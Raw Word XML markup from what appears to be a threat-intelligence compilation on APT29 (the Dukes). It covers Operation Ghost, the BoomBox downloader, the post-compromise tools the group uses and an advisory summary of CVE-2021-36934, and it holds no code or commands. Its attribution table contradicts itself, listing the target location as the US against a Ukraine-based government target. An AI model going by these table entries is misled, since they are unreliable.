        <w:t xml:space="preserve">In May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a custom .NET first-stage implant, detected as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>TrojanDownloader:MSIL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BoomBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E8362" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:r>
        <w:t xml:space="preserve">[3] Once attackers have a foothold on the machine, they usually deploy additional tools to gather </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7322B1" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:r>
        <w:t>information about the host system or other machines in the same network. These include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38069CD8" w14:textId="78CC0514" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AdFind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [44] – A tool to query the Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BBDB50" w14:textId="7F4B0422" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [45] – A tool to graph Active Directory relationships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D98BE3" w14:textId="288BC7DC" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:r>
        <w:t>Sharp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [46] – A tool to execute a command on a remote machine using SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D87F2C" w14:textId="467CADA9" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SharpView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [47] – A tool to perform recon on a Windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299390A1" w14:textId="1A7E0F1E" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:r>
        <w:t>Rubeus [48] – A tool to interact with Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D203B92" w14:textId="0D320148" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:r>
        <w:t>An exploit for CVE-2021-36934 [49] – a local privilege escalation vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789A03A9" w14:textId="77CAAD09" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="008A6A45">
      <w:r>
        <w:t>The Cobalt Strike Port Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B705E" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="00961186">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">They also usually deploy additional Cobalt Strike loaders (DLL- or PowerShell-based) that would </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62974C" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="00961186">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">load SMB beacons. These can be used to control machines in the same network that are not directly </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20530D96" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="00961186">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>connected to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CF834" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="00961186">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recent months have shown that the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Dukes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are a serious threat to western organizations, especially </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170AAC06" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="00961186">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in the diplomatic sector. They are very persistent, have good operational security, and they know how </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F762073" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="00961186">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">to create convincing phishing messages. ESET researchers expect to continue to see them targeting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3234A33E" w14:textId="41C78D15" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="00961186">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>European diplomats in the next months, with ever-evolving techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0685D1EF" w14:textId="77777777" w:rsidR="008A6A45" w:rsidRDefault="008A6A45" w:rsidP="00B86816">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF377E" w14:textId="728C71C5" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00B86816"/>
    <w:p w14:paraId="7281BF42" w14:textId="77777777" w:rsidR="00585D5F" w:rsidRDefault="00585D5F" w:rsidP="00585D5F">
      <w:r>
        <w:t>[7] Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76932DA0" w14:textId="77777777" w:rsidR="00585D5F" w:rsidRDefault="00585D5F" w:rsidP="00585D5F">
      <w:r>
        <w:t>An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A4DA3" w14:textId="77777777" w:rsidR="00585D5F" w:rsidRDefault="00585D5F" w:rsidP="00585D5F"/>
    <w:p w14:paraId="4EC53EF6" w14:textId="017C6E03" w:rsidR="00585D5F" w:rsidRDefault="00585D5F" w:rsidP="00585D5F">
      <w:r>
        <w:t>An attacker must have the ability to execute code on a victim system to exploit this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9516B9" w14:textId="77777777" w:rsidR="00585D5F" w:rsidRDefault="00585D5F" w:rsidP="00585D5F"/>
    <w:p w14:paraId="31B9CFC1" w14:textId="77777777" w:rsidR="00585D5F" w:rsidRDefault="00585D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47439835" w14:textId="7B95826F" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00F26597">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc153480855"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T1156.001</w:t>
      </w:r>
      <w:r w:rsidR="006F537E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>OPERATION GHOST The Dukes aren’t back — they never left</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="0732F2EA" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00F26597">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F26597" w:rsidRPr="002D1D50" w14:paraId="1E82C597" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="489D9D53" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61A95A55" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FB5F46" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00387DCC" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="6CB2122F" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E2FE6F" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3447B43A" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DD9EEFC" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00387DCC" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="5BE25566" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="067090B6" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="007328DE" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="276C3E81" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="007328DE" w:rsidRDefault="00F26597" w:rsidP="00E530D0">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4CA1E85E" w14:textId="77777777" w:rsidR="007178A9" w:rsidRPr="007178A9" w:rsidRDefault="00F26597" w:rsidP="007178A9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="007178A9" w:rsidRPr="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The group’s main initial tactic to breach a network is to send </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007178A9" w:rsidRPr="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="007178A9" w:rsidRPr="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> emails that contain a link </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A27FF63" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="007178A9" w:rsidP="007178A9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>or an attachment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA6B107" w14:textId="0A3041F7" w:rsidR="00BC3BEB" w:rsidRPr="00387DCC" w:rsidRDefault="00BC3BEB" w:rsidP="007178A9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Operation Ghost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="3876F16F" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14F30DA3" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5EE90D" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="007328DE" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="131F7277" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00387DCC" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Via ATT&amp;CK/TCERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="4D88FA32" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4618FDA0" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C6B5D8" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>US</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7063C774" w14:textId="4929C4F7" w:rsidR="00750C90" w:rsidRPr="00750C90" w:rsidRDefault="00F26597" w:rsidP="00750C90">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00750C90">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="00750C90" w:rsidRPr="00750C90">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The group is primarily </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EE7AC25" w14:textId="77777777" w:rsidR="00750C90" w:rsidRPr="00750C90" w:rsidRDefault="00750C90" w:rsidP="00750C90">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00750C90">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">interested in spying on governments either in the West or in former USSR countries. Besides governments, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D3B0DB1" w14:textId="58C3DCC9" w:rsidR="00F26597" w:rsidRPr="00387DCC" w:rsidRDefault="00750C90" w:rsidP="00750C90">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00750C90">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>the group has also targeted various organizations linked to NATO, think tanks, and political parties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="7B63DDC4" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AF3212A" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C4C094B" w14:textId="73A8CFBE" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F2362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidR="00750C90">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">kraine </w:t>
            </w:r>
            <w:r w:rsidRPr="006F2362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">based </w:t>
            </w:r>
            <w:r w:rsidR="00750C90">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>government department</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C0D7590" w14:textId="67339835" w:rsidR="00F26597" w:rsidRPr="00387DCC" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00750C90">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="0D4CE4B7" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="413F9AD8" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40242703" w14:textId="578C04D9" w:rsidR="00F26597" w:rsidRPr="00515289" w:rsidRDefault="00515289" w:rsidP="00E530D0">
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45F97010" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="1935532B" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59EEFE38" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409B9DF5" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D07A442" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="5AB655F8" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DC44E45" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EFB8900" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C3C054" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="4019096E" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="200CE3E3" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
